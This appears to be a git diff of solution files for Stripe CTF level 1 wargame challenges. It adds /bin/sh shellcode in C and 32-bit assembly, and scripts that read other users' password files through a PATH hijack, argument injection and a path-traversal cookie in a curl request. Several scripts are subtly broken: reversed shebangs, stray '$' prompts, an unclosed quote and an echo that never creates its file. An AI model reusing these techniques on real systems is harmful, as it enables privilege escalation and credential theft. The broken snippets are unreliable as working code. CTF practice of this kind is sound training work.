ctf 1

CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile

@@ -0,0 +1,2 @@
+shell: simplest_shellcode.c
+	gcc -static -g -o shell simplest_shellcode.c

CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md

@@ -0,0 +1,5 @@
+as --32 -o s.o   s.s  
+ld -m elf_i386 -o s s.o 
+./s
+objdump -d s
+

CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c

@@ -0,0 +1,9 @@
+#include <stdlib.h>
+int main()
+{
+  char *array[2];
+  array[0] = "/bin/sh";
+  array[1] = NULL;
+  execve(array[0], array, NULL);
+  exit(0);
+}

CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s

@@ -0,0 +1,16 @@
+.code32
+.text
+.globl _start
+
+_start:
+  xorl %eax, %eax     /* We need to push a null terminated string to the stack */
+  pushl %eax          /* So first, push a null */
+  pushl $0x68732f2f   /* Push //sh */
+  pushl $0x6e69622f   /* push /bin */
+  movl  %esp, %ebx    /* Store the %esp of /bin/sh into %ebx */
+  pushl %eax          /* Since eax is still null, let's use it again */
+  pushl %ebx          /* Now we can writ the /bin/sh again for **argv */
+  movl  %esp, %ecx    /* Write argv into %ecx */
+  xorl  %edx, %edx    /* NULL out edx */
+  movb  $0xb, %al     /* Write syscall 11 into %al */
+  int $0x80           /* Interrupt the system */

CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh

@@ -0,0 +1,6 @@
+!#/bin/sh
+cd /tmp
+echo '/bin/cat /home/level01/.password > date'
+chmod +x date
+export PATH=$PWD
+/levels/level01/level01

CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh

@@ -0,0 +1,2 @@
+!#/bin/sh
+$ /levels/level03 -20 "cat /home/level03/.password $(printf '\xac\x84\x04\x08')

CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh

@@ -0,0 +1,2 @@
+#!/bin/sh
+$ curl  --user level01:$(cat /home/level01/.password) --digest -b "user_details=../../home/level02/.password" localhost:8002/level02.php